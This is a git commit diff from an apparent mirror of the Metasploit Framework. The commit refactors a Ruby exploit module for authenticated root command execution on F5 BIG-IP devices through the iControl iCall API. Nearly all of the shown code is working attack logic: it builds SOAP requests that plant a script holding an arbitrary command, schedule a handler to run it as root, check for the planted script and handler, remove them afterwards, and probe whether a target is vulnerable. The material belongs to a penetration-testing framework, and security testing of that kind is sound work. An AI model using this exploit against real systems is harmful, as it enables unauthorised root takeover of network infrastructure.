infosecn1nja
/
metasploit-framework
mirror of https://github.com/infosecn1nja/metasploit-framework.git
1
0
Fork 0
Code Issues Packages Projects Releases Wiki Activity

Clean up description; Simplify SOAP code more

bug/bundler_fix
Jon Hart 2015-11-16 11:06:45 -08:00
parent 1aa1d7b5e4
commit 902951c0ca
No known key found for this signature in database
GPG Key ID: 2FA9F0A3AFA8E9D3
1 changed files with 26 additions and 26 deletions
Show Stats Download Patch File Download Diff File Expand all files Collapse all files

52
modules/exploits/linux/http/f5_icall_cmd.rb
View File

@ -11,16 +11,22 @@ class Metasploit3 < Msf::Exploit::Remote
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
SOAPENV_ENCODINGSTYLE = { "soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/" }
STRING_ATTRS = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
LONG_ATTRS = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
def initialize(info = {})
super(
update_info(
info,
'Name' => "F5 iControl iCall::Script Root Command Execution",
'Description' => %q{
This module exploits an authenticated a privilege escalation vulnerability
in the iControl API on the F5 BIG-IP LTM (and likely other F5 devices). The attacker needs valid
credentials and the Resource Administrator role. The exploit should work on BIG-IP 11.3.0 - 11.6.0,
(11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references for more details)
This module exploits an authenticated privilege escalation
vulnerability in the iControl API on the F5 BIG-IP LTM (and likely
other F5 devices). This requires valid credentials and the Resource
Administrator role. The exploit should work on BIG-IP 11.3.0
- 11.6.0, (11.5.x < 11.5.3 HF2 or 11.6.x < 11.6.0 HF6, see references
for more details)
},
'License' => MSF_LICENSE,
'Author' =>
@ -112,13 +118,12 @@ class Metasploit3 < Msf::Exploit::Remote
def create_script(cmd)
scriptname = Rex::Text.rand_text_alpha_lower(5)
create_xml = build_xml do |xml|
xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
xml.scripts(string_attrs) do
xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item scriptname
end
xml.definitions(string_attrs) do
xml.definitions(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item cmd
end
@ -129,9 +134,8 @@ class Metasploit3 < Msf::Exploit::Remote
def delete_script(scriptname)
delete_xml = build_xml do |xml|
xml['scr'].delete_script("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
xml.scripts(string_attrs) do
xml['scr'].delete_script(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item scriptname
end
@ -142,7 +146,7 @@ class Metasploit3 < Msf::Exploit::Remote
def script_exists(scriptname)
exists_xml = build_xml do |xml|
xml['scr'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
xml['scr'].get_list(SOAPENV_ENCODINGSTYLE)
end
res = send_soap_request(exists_xml)
res && res.code == 200 && res.body =~ Regexp.new("/Common/#{scriptname}")
@ -151,18 +155,16 @@ class Metasploit3 < Msf::Exploit::Remote
def create_handler(scriptname, interval)
handler_name = Rex::Text.rand_text_alpha_lower(5)
handler_xml = build_xml do |xml|
xml['per'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
string_attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
xml.handlers(string_attrs) do
xml['per'].create(SOAPENV_ENCODINGSTYLE) do
xml.handlers(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item handler_name
end
xml.scripts(string_attrs) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item scriptname
end
long_attrs = { 'xsi:type' => 'urn:Common.ULongSequence', 'soapenc:arrayType' => 'xsd:long[]', 'xmlns:urn' => 'urn:iControl' }
xml.intervals(long_attrs) do
xml.intervals(LONG_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item interval
end
@ -173,9 +175,8 @@ class Metasploit3 < Msf::Exploit::Remote
def delete_handler(handler_name)
delete_xml = build_xml do |xml|
xml['per'].delete_handler("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
xml.handlers(attrs) do
xml['per'].delete_handler(SOAPENV_ENCODINGSTYLE) do
xml.handlers(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item handler_name
end
@ -187,7 +188,7 @@ class Metasploit3 < Msf::Exploit::Remote
def handler_exists(handler_name)
handler_xml = build_xml do |xml|
xml['per'].get_list("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/")
xml['per'].get_list(SOAPENV_ENCODINGSTYLE)
end
res = send_soap_request(handler_xml)
res && res.code == 200 && res.body =~ Regexp.new("/Common/#{handler_name}")
@ -200,13 +201,12 @@ class Metasploit3 < Msf::Exploit::Remote
# if the user/password is wrong, a 401 error is returned, the server might or might not be vulnerable
# any other response is considered not vulnerable
check_xml = build_xml do |xml|
xml['scr'].create("soapenv:encodingStyle" => "http://schemas.xmlsoap.org/soap/encoding/") do
attrs = { 'xsi:type' => 'urn:Common.StringSequence', 'soapenc:arrayType' => 'xsd:string[]', 'xmlns:urn' => 'urn:iControl' }
xml.scripts(attrs) do
xml['scr'].create(SOAPENV_ENCODINGSTYLE) do
xml.scripts(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item
end
xml.definitions(attrs) do
xml.definitions(STRING_ATTRS) do
xml.parent.namespace = xml.parent.parent.namespace_definitions.first
xml.item
end